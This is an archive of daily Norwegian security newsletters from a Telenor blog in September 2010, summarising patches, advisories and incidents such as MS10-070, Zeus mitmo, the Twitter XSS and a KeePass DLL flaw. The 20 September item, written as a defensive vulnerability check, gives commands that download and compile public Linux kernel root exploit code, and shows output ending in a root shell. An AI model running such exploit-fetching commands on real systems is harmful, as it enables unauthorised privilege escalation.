Vi gjør oppmerksom på at informasjonen gitt i denne bloggen er ferskvare og således kan inneholde feil. Aksjoner som gjøres på grunnlag av denne er på eget ansvar. Telenor tar ikke ansvar for innhold gitt i eksterne lenker.

Thursday, 30 September 2010

2010.09.30 - Nyhetsbrev

Det har vært et rolig døgn.

Det er ingen nye saker siden sist.

Full HTML-versjon av dagens nyhetsbrev.

Wednesday, 29 September 2010

2010.09.29 - Nyhetsbrev

Sikkerhetsoppdateringen til ASP.NET svakheten (MS10-070) har blitt lansert. Sans Internet Storm Center har økt deres InfoCon-nivå til gult for å understreke alvorligheten av denne svakheten (Info: http://isc.sans.edu/diary.html?storyid=9625).

Sikkerhetsoppdatering til ASP.NET lansert (MS10-070)

Som vi meldte fra om i gårsdagens nyhetsbrev, har nå sikkerhetspatchen til ASP.NET blitt lansert. Vi anbefaler alle å oppdatere ved første og beste anledning.
Referanser
http://www.microsoft.com/technet/security/bulletin/ms10-070.mspx

Full HTML-versjon av dagens nyhetsbrev.

Tuesday, 28 September 2010

2010.09.28 - Nyhetsbrev

Microsoft slipper oppdatering for ASP.Net i løpet av dagen.

Microsoft slipper oppdatering for ASP.Net i løpet av dagen

Microsoft melder at de i løpet av dagen kommer til å slippe en oppdatering som fikser svakheten i Security Bulletin #2416728. Denne svakheten, som vi skrev om i nyhetsbrevet 20/09, ekisterer i ASP.net, og gir en angriper mulighet til å lese og endre viewstate som har blitt kryptert av server. Det anbefales å installere den så fort den foreligger.
Anbefaling
Installer oppdateringen så fort den foreligger.
Referanser
http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx
http://www.microsoft.com/technet/security/advisory/2416728.mspx

Full HTML-versjon av dagens nyhetsbrev.

Monday, 27 September 2010

2010.09.27 - Nyhetsbrev

S21sec har publisert detaljer rundt en variant av banktrojaneren Zeus som også tar over offerets mobiltelefon.

Zeus Man-in-the-mobile

Sikkerhetsselskapet S21sec har publisert detaljer rundt en interessant variant av banktrojaneren Zeus som også installerer en trojaner på offerets mobiltelefon. Mobiltrojaneren vil kjøre i bakgrunnen og videresende SMS-meldinger til angriperen, noe som kan gjøre det mulig for angriperen å få tilgang til systemer beskyttet av 2-faktor autentisering som benytter SMS. I tillegg vil mobiltelefonen kunne motta kommandoer fra angriper for å endre oppføringer i kontaktlisten. For flere detaljer, se http://securityblog.s21sec.com/
Referanser
http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-i.html
http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-ii.html
http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-iii.html

Full HTML-versjon av dagens nyhetsbrev.

Friday, 24 September 2010

2010.09.24 - Nyhetsbrev

Et rolig døgn.

Det er ingen nye saker siden sist.

Full HTML-versjon av dagens nyhetsbrev.

Wednesday, 22 September 2010

2010.09.22 - Nyhetsbrev

Twitter sårbar for en alvorlig Cross-site-scripting svakhet.

En alvorlig svakhet har blitt oppdaget i Adobe Flash Player 10.1.82.76 og tidligere. Oppdatering foreligger.

Alvorlig XSS sårbarhet i Twitter

Twitter ble i går utsatt for en Cross-site-scripting (XSS) svakhet som i løpet av noen timer ble hyppig utnyttet til å vise pop-up meldinger eller redirigere brukere til tredjeparts websider, deriblant porno-sider. Svakheten, som gjorde det mulig å plassere javascript-kode med "onMouseOver"-funksjonskall i en twitter-melding, førte til at brukere ble servert pop-up meldinger eller videresendt til andre websider ved å kun bevege/føre musen over meldingen. Mange meldinger inneholdt i tillegg kode som re-twitret den orginale meldingen uten brukerens viten. Svakheten ble tettet av Twitter etter omlag 4,5 time.
Referanser
http://blog.twitter.com/2010/09/all-about-onmouseover-incident.html

Sikkerhetsoppdatering til Adobe Flash Player

Det eksisterer en sårbarhet i Adobe Flash Player 10.1.82.76 og tidligere versjoner for Windows, Macintosh, Linux, Solaris og Android. Dette gjelder i tillegg Adobe Reader 9.3.4 og tidligere utgaver. Et vellykket angrep vil føre til at applikasjonen kræsjer, samtidig som angriperen gis full tilgang til det utsatte systemet.

Adobe har lansert en patch som løser problemene. For nærmere detaljer, henviser vi til referansen fra Adobe.
Anbefaling
Last ned sikkerhetsoppdatering.
Referanser
http://www.adobe.com/support/security/bulletins/apsb10-22.html

Full HTML-versjon av dagens nyhetsbrev.

Tuesday, 21 September 2010

2010.09.21 - Nyhetsbrev

Det har vært et rolig døgn.

Det er ingen nye saker siden sist.

Full HTML-versjon av dagens nyhetsbrev.

Monday, 20 September 2010

2010.09.20 - Nyhetsbrev

Microsoft har kommet ut med en advarsel om en svakhet i ASP.NET og Linux-kjernen er sårbar for en svakhet i 32-bits emuleringen. Begge disse rangeres som kritisk og blir aktivt utnyttet.

Svakhet i ASP.NET (Microsoft Security Advisory #2416728)

Microsoft har kommet med informasjon om en svakhet i ASP.NET som vil gi en angriper mulighet til å lese og endre viewstate som er blitt kryptert av server.

Viewstate brukes i ASP .NET for å kunne beholde tilstanden (state) mellom ulike postback til webserver, og gjøres ved at nettsiden inneholder et skjult kryptert felt som lagrer den nødvendige informasjonen. Angrepet utføres ved å modifisere viewstate og sende dette tilbake til server for så å observere responsen fra server. Ved å gjøre dette gjenatte ganger skal det være mulig å tilegne seg nok informasjon til å kunne dekryptere, lese, samt modifisere viewstate som sendes tilbake til server.

Denne svakheten er allerede blitt demonstrert (av forskere), og vi vet jo at kriminelle ikke ligger på latsiden.
Anbefaling
Vent på patch ifra Microsoft.
Referanser
https://www.microsoft.com/technet/security/advisory/2416728.mspx
http://it.slashdot.org/story/10/09/19/1941258/Researchers-Demo-ASPNET-Crypto-Attack
http://it.slashdot.org/story/10/09/13/167239/New-Crypto-Attack-Affects-Millions-of-ASPNET-Apps

Sikkerhetshull i Linux-kjernen gir root-tilgang

Exploitkode har blitt publisert på hvordan du kan utnytte et sikkerhetshull i Linux-kjernen for å øke dine egne rettigheter til å gi deg root-tilgang. Koden benytter seg av en svakhet i kompatibilitetsmodusen til kjernen som gjør at du kan kjøre 32-bits-applikasjoner på x86_64-arkitektur.

Utviklerne av Linux-kjernen har laget en patch for å fikse problemet, men denne har ikke blitt pushet ut til de stabile utgivelsene enda.

Se vedlegg for informasjon om hvordan en kan verifisere svakheten.
Anbefaling
Inntil det kommer ny utgave av Linux-kjernen, skru av 32-bits-emulering. Dersom du benytter en distribusjon som publiserer egne patchede versjoner av Linuxkjerna, så anbefaler vi at du oppgraderer til siste utgave.

Det er også mulig å slå av muligheten for å kjøre 32-bits programmer på et 64-bits system.

Dersom du vil teste om systemet ditt er sårbart, kan du laste ned exploitkoden, og kjøre følgende kommandoer:

bruker@server$ wget http://sota.gen.nz/compat2/robert_you_suck.c
bruker@server$ gcc robert_you_suck.c -o robert

Hvis systemet er sårbart, vil det se slik ut:
bruker@server$ ./robert
resolved symbol commit_creds to 0xffffffff8106ca60
resolved symbol prepare_kernel_cred to 0xffffffff8106cf90
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
root@server#

Hvis systemet ikke er sårbart, vil det se slik ut:
bruker@server$ ./robert
symbol table not available, aborting!
Process finished
Referanser
http://seclists.org/fulldisclosure/2010/Sep/273
http://sota.gen.nz/compat2/
http://sota.gen.nz/compat2/robert_you_suck.c

Full HTML-versjon av dagens nyhetsbrev.

Friday, 17 September 2010

2010.09.17 - Nyhetsbrev

Mozilla har sluppet nye versjoner av Firefox og Apple har sluppet en ny versjon av QuickTime som fikser to kjente sårbarheter.

Mozilla slipper Firefox 3.5.13 and 3.6.10

Mozilla har sluppet Firefox 3.5.13 og 3.6.10. De nye versjonene fikser et stabilitetsproblem som berører et lite knippe brukere.
Referanser
http://www.mozilla.com/en-US/firefox/3.5.13/releasenotes/
http://www.mozilla.com/en-US/firefox/3.6.10/releasenotes/

Apple slipper QuickTime 7.6.8

Apple har nå sluppet QuickTime 7.6.8, og den nye versjonen fikser to sårbarheter. Den første svakheten skyldes en feil i input-valideringen i en QuickTime ActiveX-kontroll. Utnyttelse kan føre til eksekvering av vilkårlig kode.

Den andre svakheten forårsakes av en feil relatert til usikker innlasting av DLL-filer. Utnyttelse kan føre til at en angriper får eksekvert skadelig kode.
Anbefaling
Oppdater så snart som mulig
Referanser
http://support.apple.com/kb/HT4339

Full HTML-versjon av dagens nyhetsbrev.

Thursday, 16 September 2010

2010.09.16 - Nyhetsbrev

Google har sluppet en oppdatering til Chrome.

Google Chrome oppdatering fikser 10 ulike svakheter

Google har sluppet en oppdatering til Chrome som fikser 10 ulike svakheter. Oppdateringen gjelder for både Windows, OS X og Linux.
Anbefaling
Referanser
http://googlechromereleases.blogspot.com/2010/09/stable-beta-channel-updates_14.html

Full HTML-versjon av dagens nyhetsbrev.

Wednesday, 15 September 2010

2010.09.15 - Nyhetsbrev

Microsoft har sluppet 9 oppdateringer hvorav 4 er vurdert som kritiske. Vi anbefaler å oppdatere snarest.

Vulnerability in Print Spooler Service Could Allow Remote Code Execution (MS10-061)

Det har blitt oppdaget en sårbarhet i printspooler-tjenesten til Microsoft Windows. Ved å sende en spesialutviklet pakke til et sårbart system som eksponerer dette grensesnittet via RPC-tjenesten kan en angriper kjøre vilkårlig programkode.
Anbefaling
Vi anbefaler at man oppdaterer snarest.
Referanser
http://go.microsoft.com/fwlink/?LinkId=200505

Vulnerability in Microsoft Outlook Could Allow Remote Code Execution (MS10-064)

Microsoft har identifisert en sårbarhet i Outlook. Dersom offeret er tilkoblet en online Exchange server, kan det oppstå en "heap overflow"-feil ved prosessering av korrupte TNEF-meldinger. Et vellykket angrep vil gi eksterne angripere mulighet til å ta fullstendig kontroll over et sårbart system.
Anbefaling
Vi anbefaler at man oppdaterer snarest.
Referanser
http://www.microsoft.com/technet/security/bulletin/MS10-064.mspx

Vulnerability in Unicode Scripts Processor Could Allow Remote Code Execution (MS10-063)

Microsoft Windows og Office inneholder en sårbarhet som kan utnyttes av eksterne angripere til å ta fullstendig kontroll over et sårbart system. Dette problemet skyldes en ugyldig indeks i Unicode-skriptprosessoren (USP10.DLL) ved håndtering av tabeller som benytter fontlayouten OpenType. Som med MS10-062 kan du også her bli utsatt for et angrep ved å besøke en spesialdesignet webside.
Anbefaling
Vi anbefaler at man oppdaterer snarest.
Referanser
http://www.microsoft.com/technet/security/bulletin/ms10-063.mspx

Vulnerability in MPEG-4 Codec Could Allow Remote Code Execution (MS10-062)

En sårbarhet har blitt identifisert i Windows som kan utnyttes av eksterne angripere til å ta fullstendig kontroll over et sårbart system. Problemet skyldes en "integer underflow"-feil i MPEG-4-kodeken ved prosessering av korrupte mediefiler. Dersom en sårbar klient besøker en spesialdesignet webside hvor en slik mediefil er tilgjengelig vil angriperen ha mulighet til å kjøre vilkårlig kode.
Anbefaling
Vi anbefaler at man oppdaterer snarest.
Referanser
http://www.microsoft.com/technet/security/bulletin/MS10-062.mspx

Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (MS10-065)

Oppdateringen fikser tre svakheter i IIS hvorav en av dem har vært publisert offentlig. Den mest alvorlige av dem kan medføre at man får kjørt ondsinnet programkode ved hjelp av en spesielt utformet HTTP-forespørsel mot tjeneren. Dersom et slikt angrep er vellykket vil en tredjepart kunne oppnå full kontroll over systemet.
Anbefaling
Vi anbefaler at man oppdaterer snarest.
Referanser
http://www.microsoft.com/technet/security/bulletin/ms10-065.mspx

Vulnerability in Windows Client/Server Runtime Subsystem Could Allow Elevation of Privilege (MS10-069)

Denne svakheten kan gjøre det mulig for en tredjepart å oppnå rettighetseskalering i sårbare systemer konfigurert med kinesisk, japansk eller koreansk "system locale" (valg av språk, tegnsett etc.).
Et vellykket angrep vil gi en tredjepart mulighet til å kjøre ondsinnet programkode, full kontroll over data og tilgang til å legge til nye brukerkontoer med fulle rettigheter.
Anbefaling
Vi anbefaler at man oppdaterer snarest.
Referanser
http://www.microsoft.com/technet/security/bulletin/ms10-069.mspx

Vulnerability in Local Security Authority Subsystem Service Could Allow Elevation of Privilege (MS10-068)

Denne oppdateringen rette opp en innrapportert svakhet i AD (Active Directory), ADAM (Active Directory Application Mode) og AD LDS (Active Directory Lightweight Directory Service).
Ved å utforme en spesiell LDAP (Lightweight Directory Access Protocol)-melding til en LSASS-tjener kan en angriper oppnå en rettighetseskalering. For et slikt angrep er angriperen avhengig av å ha tilgang til en konto i windows-domenet hvor tjenerne står, men klienten som benyttes i angrepet behøver ikke å være innmeldt i domenet.
Anbefaling
Vi anbefaler at man oppdaterer snarest.
Referanser
http://www.microsoft.com/technet/security/bulletin/ms10-068.mspx

Vulnerability in WordPad Text Converters Could Allow Remote Code Execution (MS10-067)

Det er oppdaget en svakhet som gjør det mulig å kjøre ondsinnet programkode ved å få brukeren av en klient til å åpne en spesielt utformet fil i WordPad. Dersom dette er vellykket vil en tredjepart kunne få kontroll over systemet med de samme rettigheter som den innloggede brukeren (som åpnet filen i WordPad).
Anbefaling
Vi anbefaler at man oppdaterer snarest.
Referanser
http://www.microsoft.com/technet/security/bulletin/ms10-067.mspx

Vulnerability in Remote Procedure Call Could Allow Remote Code Execution (MS10-066)

Ved å sende en spesielt utformet RPC-respons som svar til en RPC-forespørsel initiert av en klient kan det være mulig å få kjørt ondsinnet programkode på klienten.
En angriper vil altså måtte få en bruker til å initiere en RPC-tilkobling mot en ondsinnet server som er under kontroll av angriperen og krever således brukerinteraksjon. Dersom angrepet er vellykket vil en tredjepart få kontroll over systemet.
Anbefaling
Vi anbefaler at man oppdaterer snarest.
Referanser
http://www.microsoft.com/technet/security/bulletin/ms10-066.mspx

Full HTML-versjon av dagens nyhetsbrev.

Tuesday, 14 September 2010

2010.09.14 - Nyhetsbrev

Zero-day svakhet i Adobe Flash. Vi anbefaler å oppgradere til neste versjon så snart denne foreligger.

Adobe Flash unspecified code execution vulnerability

Det har blitt oppdaget en feil i Adobe Flash som kan føre til minnekorrupsjon, og som kan utnyttes av en angriper til å kjøre skadelig kode. For å utnytte svakheten, må angriperen lure brukeren til å åpne et spesielt utformet HTML-dokument med SWF-innhold. Det finnes i skrivende stund ingen oppdatering som fikser svakheten.
Anbefaling
Deaktiver Flash i browseren din og hold utkikk etter en oppdatering.
Referanser
http://www.adobe.com/support/security/advisories/apsa10-03.html

Full HTML-versjon av dagens nyhetsbrev.

Monday, 13 September 2010

2010.09.13 - Nyhetsbrev

Det har vært en rolig helg.

Det er ingen nye saker siden sist.

Full HTML-versjon av dagens nyhetsbrev.

Friday, 10 September 2010

2010.09.10 - Nyhetsbrev

Microsoft har sluppet detaljer om denne månedens patcher, samt exploitkode for 0-dags svakheten i Adobe Acrobat Reader er blitt sluppet i metasploit.

Microsoft Releases Advance Notification for September Security Bulletin

Microsoft melder at de kommer til å slippe 9 oppdateringer tirsdag 14 September. Oppdateringene som slippes vil fikse totalt 13 ulike svakheter i Windows, Internet Information Services (IIS) og Office. 4 av oppdateringene blir rangert som kritiske, mens resten rangeres som viktige.
Referanser
http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx

Exploitkode for Adobe Acrobat Reader 0-day tilgjengelig i metasploit

Exploitkode for å utnytte 0-dags svakheten i Adobe Acrobat Reader er blitt gjort tilgjengelig i metasploit rammeverket. Koden er derfor lett tilgjengelig for alle som måtte ha interesse av den, og vi må derfor regne med at denne raskt plukkes opp av flere exploitkit.
Anbefaling
Referanser
http://www.adobe.com/support/security/advisories/apsa10-02.html
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://blog.metasploit.com/2010/09/return-of-unpublished-adobe.html

Full HTML-versjon av dagens nyhetsbrev.

Thursday, 9 September 2010

2010.09.09 - Nyhetsbrev

Både Mozilla og Apple har kommet med nye versjoner av sine nettleser som fikser flere sikkerhetshull. I tillegg har Adobe kommentert og kommet med anbefalinger ifbm en 0-day svakhet i Adobe Acrobat/Reader. Denne svakheten utnyttes pr nå.

Apple Releases Safari 5.0.2 and 4.1.2

Versjon 4.1 og 5.0 av Safari har blitt sluppet, og flere svakheter har blitt rettet. Begge versjonene adresserer de samme sikkerhetsproblemene. Brukere av nettleserne anbefales å oppgradere til nyeste versjon. Vi henviser til kilden hos Apple for mer informasjon.
Referanser
http://support.apple.com/kb/HT4333

Mozilla Releases Firefox 3.6.9

Mozilla Firefox er ute i ny versjon og skal fikse flere sårbarheter som er rapportert i tidligere versjoner.
Referanser
http://www.mozilla.com/en-US/firefox/3.6.9/releasenotes/

0-day oppdaget i Adobe Acrobat Reader

Det er oppdaget exploitkode som utnytter en ny svakhet i Adobe Reader's håndtering av fonter. Adobe har publisert en sikkerhetsvarsel som omhandler sårbarheten, og de jobber med å rette problemet.
Anbefaling
Ikke åpne PDF-filer fra usikre kilder.
Referanser
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html

Full HTML-versjon av dagens nyhetsbrev.

Wednesday, 8 September 2010

2010.09.08 - Nyhetsbrev

Det har vært et rolig døgn.

Det er ingen nye saker siden sist.

Full HTML-versjon av dagens nyhetsbrev.

Tuesday, 7 September 2010

2010.09.07 - Nyhetsbrev

Det har vært et rolig døgn.

TrueCrypt 7.0a lanseres

Krypteringsapplikasjonen Truecrypt har kommet med den første oppdateringen til versjon 7.0.

I følge utviklerne vil denne utgaven fikse stabilitetsproblemer som inntreffer på flere utgaver av Microsoft Windows. Disse problemene inntreffer dersom OS-partisjonen er kryptert, og systemet settes i dvalemodus. Oppdateringen vil også fikse andre småproblemer som er gjeldende på alle platformer.

Utviklerne anbefaler alle brukere til å oppdatere.
Referanser
http://www.truecrypt.org/docs/?s=version-history

Full HTML-versjon av dagens nyhetsbrev.

Monday, 6 September 2010

2010.09.06 - Nyhetsbrev

Microsoft har sluppet versjon 2.0 av EMET, et verktøy som kan benyttes for å øke sikkerheten på enkelte utsatte applikasjoner. Google har sluppet versjon 6.0 av nettleseren Chrome. Den nye versjonen inneholder flere sikkerhetsoppdateringer.

Google Chrome v6.0 utbedrer mange sikkerhetssvakheter

Google har sluppet versjon 6.0 av nettleseren Chrome. Denne oppdateringen utbedrer 14 svakheter av forskjellig alvorlighetsgrad. Den nye versjonen har også andre nyheter som nytt brukerinterface, synkronisering av extensions, automatisk utfylling av forms og forbedret hastighet og stabilitet. Det anbefales å oppdatere.
Referanser
http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

Microsoft slipper EMET v2.0

Microsoft har sluppet versjon 2.0 av deres Enhanced Mitigation Experience Toolkit (EMET). Dette er et verktøy for å gjøre det vanskeligere å utnytte svakheter i applikasjoner. Verktøyet lar brukeren slå på avanserte sikkerhetsfunksjoner i applikasjoner som opprinnelig ikke har støttet dette. Dette kan gjøres uten å rekompilere programmene som skal beskyttes. Les Microsofts bloggpost for flere detaljer.
Referanser
https://www.microsoft.com/downloads/details.aspx?FamilyID=c6f0a6ee-05ac-4eb6-acd0-362559fd2f04&displayLang=en
http://blogs.technet.com/b/srd/archive/2010/09/02/enhanced-mitigation-experience-toolkit-emet-v2-0-0.aspx
http://www.h-online.com/security/news/item/Microsoft-hardening-tool-with-graphical-user-interface-1072173.html

Full HTML-versjon av dagens nyhetsbrev.

Friday, 3 September 2010

2010.09.03 - Nyhetsbrev

Det har vært et rolig døgn.

Det er ingen nye saker siden sist.

Full HTML-versjon av dagens nyhetsbrev.

Thursday, 2 September 2010

2010.09.02 - Nyhetsbrev

Det har vært et rolig døgn.

Det er ingen nye saker siden sist.

Full HTML-versjon av dagens nyhetsbrev.

Wednesday, 1 September 2010

2010.09.01 - Nyhetsbrev

Passordmanageren Keepass er sårbar for den mye omtalte .dll hijacking svakheten i Microsoft Windows.

KeePass version 2.12 <= Insecure DLL Hijacking Vulnerability (dwmapi.dll)

Keepass er en opensource passordmanager til Windows. Svakheten er relatert til en større feil som ble oppdaget i måten Windows applikasjoner søker etter og kjører .dll filer. En angriper kan utnytte svakheten ved å laste opp ondsinnede filer til et share, lokalt eller remote, hvor Windows vil søke etter og eksekvere de ondsinnede filen(e). Keepass har ikke kommet ut i ny offisiell versjon enda, men de har gitt ut en patch som fikser svakheten.
Anbefaling
Patch kan hentes ned her: http://keepass.info/filepool/KeePass_100829b.zip
Referanser
http://www.securityfocus.com/archive/1/513446

Full HTML-versjon av dagens nyhetsbrev.